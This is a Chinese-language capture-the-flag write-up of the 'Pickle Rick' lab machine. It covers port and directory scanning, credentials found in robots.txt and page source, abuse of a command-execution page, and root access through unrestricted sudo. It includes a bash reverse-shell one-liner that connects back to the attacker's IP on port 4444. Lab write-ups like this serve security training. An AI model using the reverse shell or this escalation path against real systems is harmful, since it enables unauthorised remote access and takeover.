
Pickle Rick WriteUP
渗透过程
首先,扫描目标主机地址,看开放了哪些端口:
可以看到开放了22和80两个端口,访问80端口: 注意标粗的信息,有可能是密码,查看网页源代码:
发现username,但没有找到登录界面,进行目录扫描:
发现/assests目录,访问该目录:
发现有两张gif图和两张jpg图片,将图片下载下来后查看有无隐写信息,经过binwalk和steghide查看没有有用信息,此时nmap 漏洞扫描结果发现/login.php目录和robots.txt文件:
访问robots.txt文件:
访问后发现是Wubbalubbadubdub。 访问/login.php目录:
将收集到的用户名写上,BURRRP、BURRRRRRRRP、Wubbalubbadubdub作为密码依次尝试,最后得到用户名为R1ckRul3s,密码为Wubbalubbadubdub。登录到页面内:
经查看后只有此页面也可以访问,且能进行命令执行:
将反弹shell直接写入/tmp目录,在kali的4444端口起监听:
echo 'bash -i >& /dev/tcp/10.9.141.149/4444 0>&1' > /tmp/shell.sh && chmod 777 /tmp/shell.sh && ls -l /tmp/
反弹shell成功:
查看sudo -l权限,看能否提权:
发现有sodo所有权限,直接sudo su提权为root:
查看三个flag结束渗透。

